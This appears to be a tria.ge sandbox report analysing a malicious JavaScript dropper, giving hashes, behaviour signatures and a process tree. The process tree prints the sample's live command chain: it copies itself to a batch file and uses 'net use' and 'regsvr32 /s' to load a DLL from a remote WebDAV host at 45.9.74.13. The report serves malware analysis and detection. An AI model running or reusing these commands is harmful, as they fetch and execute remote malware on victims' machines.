Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
93s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
09/07/2024, 06:17
Static task
static1
Behavioral task
behavioral1
Sample
4860312552222814311.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4860312552222814311.js
Resource
win10v2004-20240704-en
General
-
Target
4860312552222814311.js
-
Size
5KB
-
MD5
08d79ad15bc6fc6848a70f25a28eb7a0
-
SHA1
fa447ac9b1f8400c0d7fbaba97e5a79405c9426f
-
SHA256
0b83da13ccf53341792db8deec36c9af70154a0caaab8062d64a3fa8c22b9fb6
-
SHA512
8fdf7a8f536d765ce994e6df07b93a9b073c3bdf903e20588608d6a3114286fa185937db9da55b6d1d894ff0f7140549e9443b2c697153fc67bc70ffc9e76066
-
SSDEEP
96:xomU+mw9fwvcm0dy3wLxdy330pd53QpDvhnLekyzLpd++LekuLZHo2p/rk12p/e:RowCMdy34xdy33QSpdqkypd0kezrkKe
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1356 wrote to memory of 3596 1356 wscript.exe 82 PID 1356 wrote to memory of 3596 1356 wscript.exe 82 PID 3596 wrote to memory of 4404 3596 cmd.exe 85 PID 3596 wrote to memory of 4404 3596 cmd.exe 85 PID 3596 wrote to memory of 1976 3596 cmd.exe 86 PID 3596 wrote to memory of 1976 3596 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4860312552222814311.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\4860312552222814311.js" "C:\Users\Admin\\ovwexs.bat" && "C:\Users\Admin\\ovwexs.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:4404
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\68.dll3⤵PID:1976
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD508d79ad15bc6fc6848a70f25a28eb7a0
SHA1fa447ac9b1f8400c0d7fbaba97e5a79405c9426f
SHA2560b83da13ccf53341792db8deec36c9af70154a0caaab8062d64a3fa8c22b9fb6
SHA5128fdf7a8f536d765ce994e6df07b93a9b073c3bdf903e20588608d6a3114286fa185937db9da55b6d1d894ff0f7140549e9443b2c697153fc67bc70ffc9e76066